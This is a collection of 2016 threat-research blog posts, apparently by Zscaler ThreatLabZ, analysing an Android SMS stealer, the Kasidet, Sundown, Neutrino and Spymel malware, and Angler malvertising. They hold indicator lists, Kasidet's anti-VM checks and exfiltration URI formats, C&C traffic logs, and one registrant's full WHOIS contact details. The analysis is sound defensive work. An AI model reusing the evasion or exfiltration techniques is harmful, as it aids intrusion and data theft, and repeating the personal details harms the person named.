Wednesday, February 10, 2016

Fake Security App for AliPay customers - Android SMS Stealer


During an ongoing analysis to protect our customers from the latest mobile threats, we came across an Android malware that disguised itself as a security feature for a famous Chinese online payment app, AliPay. Upon analysis, we discovered that the fake app is a malicious SMS stealer Trojan.

The malware developers were interested in targeting AliPay due to its widespread customer base.

Alipay is a third-party online payment platform with no transaction fees, with more than 65 financial institutions including Visa as well as Mastercard. Globally, more than 300 merchants use Alipay. It currently supports transactions in 14 major foreign currencies. AliPay is also considered the PayPal of the East.


Fake AliPay Security Controls App

Appname (app label) : 安全控件
Md5 : fad55b4432ed9eeb5d7426c55681586c
Package Name : com.bing.receive
Virus Total Detection : 2/55 (at the time of analysis)

The app portrays itself as "Security Controls" tricking victim to think it’s an app enhancing AliPay security. Upon installation, the app hides itself and the icon disappears, which is a usual technique for a malware to stay hidden. Once installed, the malware registers Android services, which steals SMS and forwards them to the Command and Control (C&C) server.


Technical details 

Upon installation, the app shows itself as a part of AliPay group.

App Icon

As soon as the victim tries to use the app, it displays an introductory screen and it was programmed to disappear after 3 seconds. Both the screen and the icon are gone at this instance.

Introductory Screen


The victim might think that the app must be faulty and was removed implicitly by Android OS.  Lesser does s/he knows that malware is activated in the background and achieves its tasks through services.

Android services are components that can run in background and perform long running tasks without user's knowledge. Following are the services used and defined by the malware:
  • MyService
  • DealService
  • TestService
The malware also registers few broadcast receivers alongside. Broadcast receivers are Android components which acts upon activation of particular events they are registered for.

Following are the receivers registered by malware:

  • System Boot Receiver 
  • Massage Receiver (Note the typo - Massage instead of Message)
  • Screen-On Receiver
The function MainActivity of malware hides the icon and starts the service named, MyService.


Main Activity
As soon as MyService is started, it initiates other tasks and registers SystemBootReceiver and MassageReceiver.

MyService Service
MassageReceiver is a broadcast receiver and is triggered whenever an SMS is received. Its main task is to look for any incoming SMS message and fetch its details. Once the details are fetched, it calls DealService and passes the SMS data along with the call.

MassageReceiver Broadcast Receiver
DealService's task is to get the SMS messages from receiver and send it across to the C&C server. It starts an Asynchronous task (AsyncTask, as shown in screenshot below) which then forwards the messages to C&C server in the form of POST request.

Fetching SMS and POST request
SMS details are sent to the C&C server using POST request, as seen in screenshot below. Unfortunately the C&C server was already taken down during the analysis and so further details related to campaign could not be fetched.

SMS data sent to CnC

Along with MassageReceiver, another receiver named SystemBootReceiver plays an important role for malware's persistent nature by making sure that the motive of malware is achieved all the time.

SystemBootReceiver is a broadcast receiver that triggers itself at every system reboot.
Its main task is to make sure MyService is up and running. At every reboot, it starts MyService as seen below:
System Boot Receiver

The main motive of malware developer was to collect SMS messages from victim's phone. The malware author's end goal is unknown at present but we will be actively looking for traces of this campaign.

Work Flow of Malware: 

Work Flow

Mitigations

We always suggest that our customers and everyone, do not trust apps from unknown parties and only download items from the official app stores that are trustworthy, like Google's Playstore.

The only official apps provided by AliPay are as shown in the screenshot below. There is no mention of any app named AliPay-Security Controls.


Playstore - Official AliPay Apps
Removal

Since the malware does not ask for Administrator privileges, removing it is not a difficult task.

The victim can traverse to Settings option in the Android device.
  • Settings --> Apps
  • Find the app in the list and click on it
  • Then, click on Uninstall option
  • Click Ok
We urge users to not trust any unknown links received via messages or emails. Additionally, disable the option of "Unknown Sources" under Settings of your device. This will not allow installation of apps from unknown sources. 

Friday, January 29, 2016

Malicious Office files dropping Kasidet and Dridex

Introduction 

We have covered Dridex Banking Trojan being delivered via various campaigns involving Office documents with malicious VBA macros in the past. However, over the past two weeks we are seeing these malicious VBA macros leveraged to drop Kasidet backdoor in addition to Dridex on the infected systems. These malicious Office documents are being spread as an attachment using spear phishing emails as described here. The malicious macro inside the Office document is obfuscated as shown in the code snapshot below -

Macro code
The macro downloads malware payload from the hardcoded URL. We have seen following URLs used in different document payloads that we captured for this campaign:

  •       armandosofsalem[.]com/l9k7hg4/b4387kfd[.]exe
  •       trinity.ad-ventures[.]es/l9k7hg4/b4387kfd[.]exe
  •       188.226.152[.]172/l9k7hg4/b4387kfd[.]exe


In this blog, we will provide a detailed analysis for the Kasidet variant that we spotted in this campaign.

Kasidet Analysis

Installation: 
Kasidet installs itself into %APPDATA% folder. It creates a new folder there with the name "Y1FeZFVYXllb", this string is hardcoded in the malware. The same string is used as mutex name and in creating a Registry key for ensuring persistence upon system reboot.

AntiVM Check:
Kasidet tries to detect analysis systems during execution through following checks.
Checking Dubugger through "IsDebuggerPresent" and "CheckRemoteDebuggerPresent" Windows APIs. It also checks for the following popular sandbox related strings:

User Name: "MALTEST",  "TEQUILABOOMBOOM", "SANDBOX", "VIRUS", "MALWARE"
File Name: "SAMPLE", "VIRUS", "SANDBOX"

It tries to detect wine software by checking if kernel32.dll is exporting "wine_get_unix_file_name" function or not. It detects Vmware, VirtualBox, QEMU and Bochs by checking for following registry entries:




Vmware
"SOFTWARE\\VMware, Inc.\\VMware Tools"
"HARDWARE\DEVICEMAP\Scsi\Scsi Port\Scsi Bus\Target Id\Logical Unit Id", "Identifier" , Vmware"
"HARDWARE\DEVICEMAP\Scsi\Scsi Port\Scsi Bus\Target Id\Logical Unit Id", "Identifier" , "VBOX"

VirtualBox
"HARDWARE\\Description\\System", "SystemBiosVersion" , "VBOX"
SOFTWARE\\Oracle\\VirtualBox Guest Additions"
"HARDWARE\\Description\\System", "VideoBiosVersion" , "VIRTUALBOX"
QEMU
"HARDWARE\DEVICEMAP\Scsi\Scsi Port \Scsi Bus \Target Id \Logical Unit Id ", "Identifier" , "QEMU"
"HARDWARE\\Description\\System" , "SystemBiosVersion" , "QEMU"
Bochs
"HARDWARE\\Description\\System" , "SystemBiosVersion" , "BOCHS”

Information Stealing capabilities:

Kasidet uses following two methods for stealing information from the victim's machine:


1. Memory Scraping – This allows Kasidet to steal credit card data from the memory of Point-Of-Sale (POS) systems. It scans the memory of all the running processes except the operating system processes listed below:
System
smss.exe
csrss.exe
winlogon.exe
lsass.exe
spoolsv.exe
devenv.exe

The stolen information is relayed back to the attacker using following URI format – 


d=1&id=<MachineID>&name=<SystemName>&type=<Track1 or Track2 data>&data=<stolen data>&p=< Process elevation status >

2. Browser Hooking –  This allows Kasidet to steal data from Web browsers. It can inject code into FireFox, Chrome, and Internet Explorer (IE). Browser names are not saved in plain text and instead this variant uses the same hash function as used by Carberp malware to encrypt the browser names. The following APIs are hooked in the web browser for stealing sensitive data: 

Browser
API
FireFox
PR_Write
Chrome
WSASend
IE
HttpSendRequestW , InternetWriteFile

The stolen information is relayed back to the attacker using following URI format – 

ff=1&id=<MachineID>&name=<SystemName>&host=<Base64 encoded host name>&form=< Base64 encoded HTTP header data>&browser=<Browser name>

The information stealing feature of this Kasidet variant were deactivated if the system locale or GeoUserID corresponds to Russia.

Network communication:
Kasidet contains a hardcoded list of Command & Control (C&C) server locations. It uses CryptStringToBinary API call to decrypt the embedded C&C URLs as seen below:

Kasidet C&C list
Upon successful infection, Kasidet sends a HTTP POST request with data “enter=1” (without quotes). All HTTP header fields (User-Agent, Content-type and Cookie) are hard coded in the payload itself.
Kasidet Hardcoded HTTP fields

C&C Server will not return required data if HTTP header fields are different.  The server sends a fake 404 response code and html data stating that page is not found but the C&C commands will be hidden in the response HTML comment tag as seen below:

Kasidet - First communication with C&C

Kasidet will request for additional commands from the C&C server with the following POST request:

Kasidet request for additional commands

Variable
Descriptions
cmd
Command. It is hardcoded in the malware payload as '1'.
id
MachineGuid value fetched  from Software\Microsoft\Cryptography registry key
name
System Name
os
Operating system version
p
Process elevation status
av
Antivirus installed on the infected system
v
Version of the bot. It is hardcoded in the malware. Current version that we analysed is 4.4
w
Flag that indicates whether the system locale and UserGeoID is Russia

Like browser names, all the command strings are also encrypted using a hash function. Below are some of the important commands:

Command Hash
Description
0x0E587A65 (rate <number>)
It is used in sleep function
0x89127D3
DDOS using HTTP protocol
0x0B37A84B6
Start keylogging and screen capture threads
0x89068E8h
Download and execute additional component. This file can be DLL, EXE or VBS.
0x4A9981B7
Search for given process name in current running processes in the system
0x8D26744
Find given file in system and upload to the server
0CAB1E64A
Drop setting.bin file,  change firewall settings to download and execute plugin component
0x10E6C4
Execute given command using windows cmd.exe


Conclusion 

Malicious Office document file is a popular vector for malware authors to deliver their payloads. Dridex authors have leveraged this technique for over a year and it was interesting to see the same campaign and URLs being leveraged to deliver Kasidet payloads. While this does not establish any links between the two malware family authors, it reaffirms the fact that a lot of the underlying infrastructure and delivery mechanisms are often shared by these cyber criminals.

ThreatLabZ is actively monitoring this threat and ensuring signature coverage for Zscaler customers.

Analysis by - Abhay Yadav, Avinash Kumar and Nirmal Singh

Tuesday, January 19, 2016

Music-themed Malvertising Lead to Angler

Overview

Malvertising, or "malicious advertising," is not a new threat, and just a few weeks into 2016 ThreatLabZ has observed a malvertising campaign injecting iframes into banner advertisements that lead to Angler Exploit Kit. Surprisingly, the Angler operators took some vacation for the New Year, as noted by F-Secure, and have only recently resumed operations, so we were surprised to see a malvertising campaign so soon after their break.

This post will detail aspects of this campaign, and there is a reference list of indicators at the end of this post.

OpenX/OpenAds and Malvertising

OpenAds, now called OpenX or Revive Adserver, is an advertisement platform with a long history and is still quite popular. From a high level, when a user browses to a website using OpenAds for serving advertisements, small code stubs make requests to the OpenAds server, which decides which banner advertisement to run and sends the banner ad plus some tracking code back to the page. The banner advertisements usually rotate on some interval, and a single ad server can serve and control advertisements for multiple domains.

Unfortuantely, the nature of banner advertisements makes them highly lucrative for criminal groups since injecting malicious content into an advertisement can impact hundreds or thousands of sites. This particular campaign impacted multiple OpenAds/OpenX servers which affected hundreds of domains. Intermediary sites were used as an additional hop prior to serving the Angler landing page, and only six second-level intermediary domains were observed, each using dozens of different subdomains and URIs. All six second-level intermediary domains share music-themed names:
  • everyoneismusical.com
  • musik4fingersonthemove.com
  • musik4littlefingers.com
  • youaremusical.com
  • youaremusicalforms.com
  • youaremusik.com
Interestingly, these intermediary domains only use two different IPs for all the subdomains, and the operators appear to have changed hosts suddenly. Figure 1 shows the number of hits we captured for these two IPs.

Fig 1: Hits on Intermediary Domain IPs

iframe Trampolining

The infection cycle starts with a malicious iframe injected in the banner advertisement code that references an intermediary URL. The injected iframe loads transparently, and the intermediary domain server will respond in one of the following three ways:
  • Response code 200 - iframe to Angler Exploit Kit landing page
  • Response code 204 - no content
  • Response code 404 - fake 'not found' page
If the intermediary domain serves an iframe, the Angler landing page is loaded transparently. A more complete overview of the infection cycle is shown below in Figure 2.

Fig 2: Overview of Infection Cycle
We're calling the intermediary domain an "iframe trampoline" since the server may not respond with another iframe and can simply bounce the user out of the infection cycle with benign content.

Infection Cycle

Looking at a full infection cycle in Figure 3, the benign domain 'giftsnideas.com' loads a banner ad with OpenX which contains an injected iframe to the trampoline domain. The trampoline domain's iframe finally sends the user to the Angler landing page. In this instance, the exploit failed, so no further content was loaded.

Fig 3: Relevant URLs for Exploit Cycle
Banner advertisement code on OpenAds/OpenX is very similar between servers. Figure 4 shows the injected iframe, which is simply inserted into the legitimate banner advertisement code.
Fig 4: Advertisement with Injected iframe
All trampoline domains used a very similar URL format of two alphabetic directories followed by an alphabetic JavaScript file (.js). The only content loaded in every successful instance is an iframe to the Angler landing page, as shown in Figure 5.
Fig 5: Trampoline Header and Response
The Angler landing page is exactly what you'd expect and although there have been some recent changes, we won't rehash Angler in this post.
Fig 6: Angler Landing Page

Conclusion

Malvertising continues to be a highly effective means of targeting and compromising a large number of victims, and we expect this trend to continue for 2016. We noted that many of the victim sites we observed in this campaign were radio stations and auto enthusiast forums. Domains in these two groups are owned by Saga Communications and Autoforums.com, so it's likely that each uses a small number of ad servers to power the entire network of sites. ThreatLabZ will continue to monitor this campaign.

Indicators


# HitsSecond Level DomainRegistrarRegistrant
23883youaremusik.comGODADDYMark Lippman
20681musik4fingersonthemove.comGODADDYMark Lippman
16878everyoneismusical.comGODADDYMichael Lippman
16849musik4littlefingers.comGODADDYMark Lippman
5698youaremusical.comGODADDYMichael Lippman
1619youaremusicalforms.comGODADDYMichael Lippman

URL IPs

188.227.72.137 - IT-Grad nets - AS48096
188.227.74.150 - IT-Grad nets - AS48096


List of FQDNs and URLs

Counts and FQDNs - via Pastebin (http://pastebin.com/7vSYi2uz)
URLs - via Pastebin (http://pastebin.com/QN9WqzPn)

Whois Samples

Domain Name: MUSIK4LITTLEFINGERS.COM
Registry Domain ID: 1916653940_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Update Date: 2015-04-05T16:22:42Z
Creation Date: 2015-04-05T16:22:42Z
Registrar Registration Expiration Date: 2018-04-05T16:22:42Z
Registrant Name: Mark Lippman
Registrant Organization:
Registrant Street: 4 Cloverbrooke Court
Registrant City: Potomic
Registrant State/Province: Maryland
Registrant Postal Code: 20854
Registrant Country: US
Registrant Phone: +1.2404294083
Registrant Phone Ext:
Registrant Fax: +1.1
Registrant Fax Ext:
Registrant Email: mhlippman@gmail.com
Registry Admin ID:
Admin Name: Mark Lippman
Admin Organization:
Admin Street: 4 Cloverbrooke Court
Admin City: Potomic
Admin State/Province: Maryland
Admin Postal Code: 20854
Admin Country: US
Admin Phone: +1.2404294083
Admin Phone Ext:
Admin Fax: +1.1
Admin Fax Ext:
Admin Email: mhlippman@gmail.com
Registry Tech ID:
Tech Name: Mark Lippman
Tech Organization:
Tech Street: 4 Cloverbrooke Court
Tech City: Potomic
Tech State/Province: Maryland
Tech Postal Code: 20854
Tech Country: US
Tech Phone: +1.2404294083
Tech Phone Ext:
Tech Fax: +1.1
Tech Fax Ext:
Tech Email: mhlippman@gmail.com
Name Server: NS67.DOMAINCONTROL.COM
Name Server: NS68.DOMAINCONTROL.COM

Domain Name: EVERYONEISMUSICAL.COM
Registry Domain ID: 1917710979_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Update Date: 2015-06-04T12:18:00Z
Creation Date: 2015-04-08T19:34:50Z
Registrar Registration Expiration Date: 2018-04-05T11:59:59Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited http://www.icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited http://www.icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited http://www.icann.org/epp#clientDeleteProhibited
Registry Registrant ID: 
Registrant Name: Michael Lippman
Registrant Organization: 
Registrant Street: 4 Cloverbrooke Court
Registrant City: Potomic
Registrant State/Province: Maryland
Registrant Postal Code: 20854
Registrant Country: US
Registrant Phone: +1.2404298083
Registrant Phone Ext:
Registrant Fax: 
Registrant Fax Ext:
Registrant Email: mhlippman@gmail.com
Registry Admin ID: 
Admin Name: Michael Lippman
Admin Organization: 
Admin Street: 4 Cloverbrooke Court
Admin City: Potomic
Admin State/Province: Maryland
Admin Postal Code: 20854
Admin Country: US
Admin Phone: +1.2404298083
Admin Phone Ext:
Admin Fax: 
Admin Fax Ext:
Admin Email: mhlippman@gmail.com
Registry Tech ID: 
Tech Name: Michael Lippman
Tech Organization: 
Tech Street: 4 Cloverbrooke Court
Tech City: Potomic
Tech State/Province: Maryland
Tech Postal Code: 20854
Tech Country: US
Tech Phone: +1.2404298083
Tech Phone Ext:
Tech Fax: 
Tech Fax Ext:
Tech Email: mhlippman@gmail.com
Name Server: NS37.DOMAINCONTROL.COM
Name Server: NS38.DOMAINCONTROL.COM



Tuesday, January 12, 2016

There Goes The Neighborhood - Bad Actors on GMHOST Alexander Mulgin Serginovic

Introduction

Whether they encourage it or not, some network operators become known and favored by criminals such as those that operate exploit kit (EK) and malware infrastructure. After following up the Sundown EK recently pointed out by @malwareforme on the Threatglass database, we found Neutrino (looking like Angler) and other bad behavior in the same network "neighborhood".

It's not clear what reputation this hoster has within the underground community, but the Sundown and Neutrino campaigns both appeared within the same address space registered under "Alexander Mulgin Serginovic" (AMS) with the first Neutrino hits coinciding with the last few hits of Sundown's December 2015 campaign. We have not identified any link between these campaigns apart from the hoster, but we wanted to provide a quick look at some of these activities and the specific indicators we have seen.

Sundown Behavior

Other analysts have observed the emergence of the Sundown EK (aka Beta Exploit Pack), with Kafeine in particular commenting that Sundown is a very simple EK compared to the more mature kits like Angler. This continues to be the case, however we have seen that the group operating Sundown has made adjustments, including some changes that happened in the midst of this campaign.

Injects

The campaign on ForoMTB Sundown used a small malicious inject within one of the included JavaScript libraries:


On CinemaHD, we saw a basic IFRAME inserted directly into the page:


Gates

During December we saw the gate "millychiccolo[.]space/jhgrjhk.php", and after the new year we have seen "pienadigrazia[.]space/counter.php" though we also saw direct traffic from the compromised sites.

Landing Pages

In the past 45 days we have seen Sundown operate with various domains hosting the landing pages, but only on two different IPs: 81.94.199.16 and 185.86.77.160. The path component of the landing page has gone through several iterations. The early hits in this campaign were seen to "millychiccolo[.]space/?9b5b49f7f8c07f43effe4aecc67bf254". Later, the landing page path was encoded with base64 as such: "millychiccolo.space/?OWI1YjQ5ZjdmOGMwN2Y0M2VmZmU0YWVjYzY3YmYyNTQ=". It should be noted that this base64 string decodes to the same MD5-looking path used in the first instance. Sundown changed up the underlying "MD5" for the new year, and we have seen landing pages at "arbitraryh.top/?NjExODEzY2MzNTkyZTkyYWYxZmNlYjExODQzMzAz" (the path decodes to 611813cc3592e92af1fceb11843303).

These are some of the domains we saw delivering Sundown landing pages, exploits, and malware payloads:
nomeatea.space
millychiccolo.space
pianolessons.co.vu
tequeryomuch.space
ilsignoreconte.space
arbitraryh.top
pienadigrazia.space

Despite the path changes, the behavior of the Sundown landing page is still quite simple: a "carpet bombing" where many or all possible exploits are tried, in some cases with multiple successes. An example of the exploitation flow:
ilsignoreconte[.]space/new/e/360a296ea1e0abb38f1080f5e802fb4b.html
ilsignoreconte[.]space/new/e/053d33558d578d2cafe77639209ab4d9.html
ilsignoreconte[.]space/new/e/49c58cc2b166b1a5b13eab5f472a4f7b.html
ilsignoreconte[.]space/new/e/49c58cc2b166b1a5b13eab5f472a4f7b.swf

Exploit Payloads

Sundown was seen sending the following exploit payloads:
poc2.flv - CVE-2015-3113
49c58cc2b166b1a5b13eab5f472a4f7b.swf - CVE-2015-5122
865hkjjhgfhjrgjkgyjtyg6lkjthyrkljtgh.html - CVE-2015-2419
8573855j6lhk4j54kl5jhk53j654364354.html - CVE-2013-2551
8500d58389eba3b3820a17641449b81d.html - CVE-2014-6332
360a296ea1e0abb38f1080f5e802fb4b.swf - CVE-2014-0515
053d33558d578d2cafe77639209ab4d9.swf - CVE-2015-3113 (via poc2.flv)

Malware Payloads

The delivery of the malware samples was another aspect of Sundown that we saw change. Through December 26, the malware payloads were downloaded from the URL "tequeryomuch[.]space/new/download.php?d=9b5b49f7f8c07f43effe4aecc67bf254". On the 27th we saw payloads coming from "tequeryomuch[.]space/?NGFlY2M2N2JmMjU0&d=9b5b49f7f8c07f43effe4aecc67bf254".

Some of the samples we observed during this campaign:
Sample
4BAEEE098C34B463EB8AC709B9BD9967 (the sample seen on Threatglass)

Behavior
{"dropped_path":"C:\\Documents and Settings\\user\\Application Data\\ZlFZQkBA\\twunk_32.exe","dropped_md5":"4BAEEE098C34B463EB8AC709B9BD9967"}
{"dropped_path":"C:\\WINDOWS\\Tasks\\ZlFZQkBA.job","dropped_md5":"22D5FD2A8675CF3B673D84716384AE8A"}

{"url":"imagescdn[.]ru/redir.php","destIP":"5.206.60.129","ua":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0, Content-type: application/x-www-form-urlencoded","method":"POST","destPort":"80"}
{"url":"imagescdn[.]ru/redir.php","destIP":"178.137.82.42","ua":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0, Content-type: application/x-www-form-urlencoded","method":"POST","destPort":"80"}
{"url":"imagescdn[.]ru/redir.php","destIP":"213.231.31.192","ua":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0, Content-type: application/x-www-form-urlencoded","method":"POST","destPort":"80"}
Sample
D754B473AF45B8D3565C1323D29EAD51

Behavior
{"dropped_path":"C:\\Documents and Settings\\user\\Application Data\\ZlFZQkBA\\taskman.exe","dropped_md5":"D754B473AF45B8D3565C1323D29EAD51"}
{"dropped_path":"C:\\WINDOWS\\Tasks\\ZlFZQkBA.job","dropped_md5":"07808D2E9A1D1607FCB81C1E0CA03358"}

{"url":"imagescdn[.]ru/redir.php","destIP":"109.251.77.14","ua":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0
Content-type: application/x-www-form-urlencoded","method":"POST","destPort":"80"}
{"url":"imagescdn[.]ru/redir.php","destIP":"109.251.77.14","ua":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0
Content-type: application/x-www-form-urlencoded","method":"POST","destPort":"80"}
{"url":"imagescdn[.]ru/redir.php","destIP":"213.111.238.98","ua":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0
Content-type: application/x-www-form-urlencoded","method":"POST","destPort":"80"}
Sample
6580F61B8B1AABFE3CAD6983CA9B2505

Behavior
{"dropped_path":"C:\\DOCUME~1\\user\\LOCALS~1\\Temp\\svchost.exe","dropped_md5":"FAA8EA9027ED6B6C875C247E59285270"}
{"dropped_path":"C:\\Documents and Settings\\user\\Application Data\\programutiliity\\filename.exe","dropped_md5":"A1429E43D7F19EB893FCC5D7BD2B21E9"}
{"dropped_path":"C:\\Documents and Settings\\user\\Start Menu\\Programs\\Startup\\filename.bat","dropped_md5":"7C444F8193480F6DC571BB6483E60A6A"}

Geographic Distribution

We've primarily seen this Sundown campaign affect users located in Spain, though this may have more to do with the fact that the primary infected site is a Spanish-language forum.



Control Panel Login

Though we did not make any efforts to break into the Control Panel, we found it interesting that the login portal was so readily available to anyone who bothered to poke around at all. It's definitely looking a little flashier since Kafeine's analysis.


Neutrino Behavior

Neutrino, like Sundown, operates in the shadow of Angler. In this case, the first signs of activity seen in the campaign actually look very much like Angler, so much so that Blue Coat's blog about the same activity was later updated to correct the identification. Regardless of whether the initial traffic is actually Angler or not, the campaign changed noticeably over the observed duration. The early stage of the campaign triggered Angler signatures from a variety of sources. As can be seen below, the code features the "malware.dontneedcoffee.com" test that has been common to Angler.


Later stages of the campaign showed more expected Neutrino behavior: where the first stage after the infected website was initially an Angler-alike landing page, the injected code instead directs users to an HTML page that loads a malicious Flash object. This can be clearly seen below in the side-by-side comparison.


Infected Sites and Landing Pages

Many of the sites serving this Neutrino campaign were registered under .CZ, the top-level domain (TLD) for the Czech Republic. Since full list is too long to include here, we have created a Pastebin with the data.

We saw landing pages served up from these IPs:
185.86.77.52
89.38.146.229
37.157.195.55
45.32.238.202
185.12.178.219
89.38.144.75 
The list of landing page domains is again too long to reproduce here, so please see our Pastebin for the data.

Payloads

While we did not observe a malicious payload from the "Angler" behavior, we found the later stage of the campaign delivered a CyrptoWall 4.0 payload. Shown below is the notice from the locker malware.

Geographic Distribution

The geographic distribution of clients affected by this campaign is somewhat more dispersed than the Sundown campaign, though the majority of users were located in the US.


Malware Command and Control

In addition to Sundown and Neutrino (with a case of multiple personality disorder), we also identified Necurs and Radamant callback activity on the AMS network. We include details of this activity below.

Necurs Activity

Necurs is a fairly well-known rootkit that is often distributed by EKs and spam e-mails. We did not identify the infection vector for this campaign, but we saw some post infection activity to a Necurs C&C server hosted by AMS. The AMS C&C is only one of many C&Cs we saw, but in an interesting trend, we saw the Necurs callback activity drop off almost entirely going into 2016.




Please find the list of Necurs callback IPs on our Pastebin.

Radamant Activity

Radamant is yet another file locker, that according to BleepingComputer just recently became available as of December 7 2015. While we haven't seen very widespread distribution of Radamant yet, we have seen examples from as early as December 4, attempting communication with a server at our new favorite hoster as seen below.

{"url":"checkip.dyndns.org/","destIP":"91.198.22.70","ua":"","method":"GET","destPort":"80"}
{"url":"185[.]86.79.100/API.php","destIP":"185.86.79.100","ua":"","method":"POST","destPort":"80"}
{"url":"185[.]86.79.100/API.php","destIP":"185.86.79.100","ua":"","method":"POST","destPort":"80"}
{"url":"185[.]86.79.100/API.php","destIP":"185.86.79.100","ua":"","method":"POST","destPort":"80"}
{"url":"185[.]86.79.100/mask.php","destIP":"185.86.79.100","ua":"","method":"POST","destPort":"80"}

Conclusion

AMS may host many legitimate customers, and while we didn't intend to call them out specifically, we wanted to share some of the malicious behavior we have seen involving this network (and others) in an effort to help other defenders. ThreatLabZ will continue to monitor these campaigns and ensure protection for organizations using the Zscaler Internet security platform.

Wednesday, January 6, 2016

Yet Another Signed Malware - Spymel

Introduction

ThreatLabZ came across yet another malware family where the authors are using compromised digital certificates to evade detection. The malware family in this case is the information stealing Trojan Spymel and involved a .NET executable signed with a legitimate DigiCert issued certificate.

The infection cycle typically starts with a malicious JavaScript file that arrives in a ZIP archive via e-mail attachment. Once the user opens the JavaScript file, it will download and install the malware executable on the victim machine.

The malicious JavaScript file, surprisingly, in this case is not obfuscated and easy to read as seen in screenshot below. The Trojan Spymel executable gets downloaded from a remote location hardcoded in the JavaScript.

 Hardcoded URL for Spymel Download


Information Stealer - Trojan Spymel

The downloaded malware executable is a highly obfuscated .NET binary, which is digitally signed with a certificate issued to “SBO INVEST”. The certificate was promptly revoked by DigiCert when notified and, therefore, is not active in any attack. We noticed a newer variant arose within two weeks of the first variant, using another certificate issued to "SBO INVEST' that is also revoked.

Certificate used to sign Spymel

Spymel Payload Hashes
4E86F05B4F533DD216540A98591FFAC2

2B52B5AA33A0A067C34563CC3010C6AF

Installation
Spymel drops itself as “svchost.exe” and “Startup32.1.exe” in the following location:

WinXP
%Application Data%\ProgramFiles(32.1)\svchost.exe
%User%\Start Menu\Programs\Startup\Startup32.1.exe

Win7
%AppData%\Roaming\ProgramFiles(32.1)\svchost.exe
%AppData%\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\Startup32.1.exe
 
Following registry entries are created to remain persistent on the target system:

WinXP
HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run @ Sidebar(32.1)
HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run @  Sidebar(32.1)

Win7
HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run Sidebar(32.1)
HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run Sidebar(32.1)

Spymel Trojan configuration data including Command & Control server and File & Registry information is hardcoded within the executable as seen below:

Spymel settings

Module Information
During our analysis, we came across following modules in the malware executable:

Keylogging
This module logs all user keystrokes into a log file at the following location:

%Application Data%\ProgramFiles(32.1)\svchost.exe.tmp

Below snapshot shows the keylogging module where the name of the class is "kyl":

Keylogging code
ProtectMe
This module allows Spymel to prevent the victim user from terminating malware and other running processes on the system using tools like TaskMgr, Procexp, ProcessHacker and Taskkill. The malware disables the 'OK' button on the confirmation prompt for Process Explorer as seen below:


Microsoft Taskkill command won't work as expected either despite the SUCCESS notification:

Below is the code snippet of class “ProtectMe”:
Code of ProtectMe class

The malware monitors application like Task Manager, Process Explorer, and Process Hacker. It uses GetForegroundWindow() API to get the handle of active window and changes it's functionality if process is from the above list.




Network activity
It connects to a remote domain android.sh (213.136.92.111) on port 1216.  Upon successful connection, Spymel starts sending information about the active process window. Below is a screenshot of network capture:

                                      

awt<Base64 endcoded active window title>djamel
Below are some of the commands that the malware can receive from the Command & Control server:

Command
Description
i
Sends information about user name, OS name, running processes, Video module flag, active window title.
GetDrives
Information about drives in system.
FileManager
Information about folders and files for given location.
Delete
Deletes given file or folder
Execute
Executes given file.
Rename
Rename given file or folder
sup
Uninstall itself
klogs
Upload keylogging file to C&C. *
klold
Upload requested file to C&C *
ks
Search for given string in all keylogging files.
dklold
Delete given keylogging file.
dp
Sends Desktop snapshot
dform
Download file from give URL
VideoMode
On|Off video recording
veUpdate
Provide settings of video recording for specific processes.

  *File contents will be encrypted using base64 encoding.  

Recording video of browser processes


Conclusion

Using digital certificate to disguise malware is common and Spymel is yet another example of this. Spymel is an information stealing malware that spies on all user activity on the compromised machine and relays it to the attacker. This malware typically arrives via spammed e-mail leveraging social engineering to infect the target system.

Zscaler’s ThreatLabZ has confirmed coverage for the initial downloader and Spymel payloads, ensuring protection for organizations using Zscaler’s Internet security platform.

Analysis by Tarun Dewan and Amandeep Kumar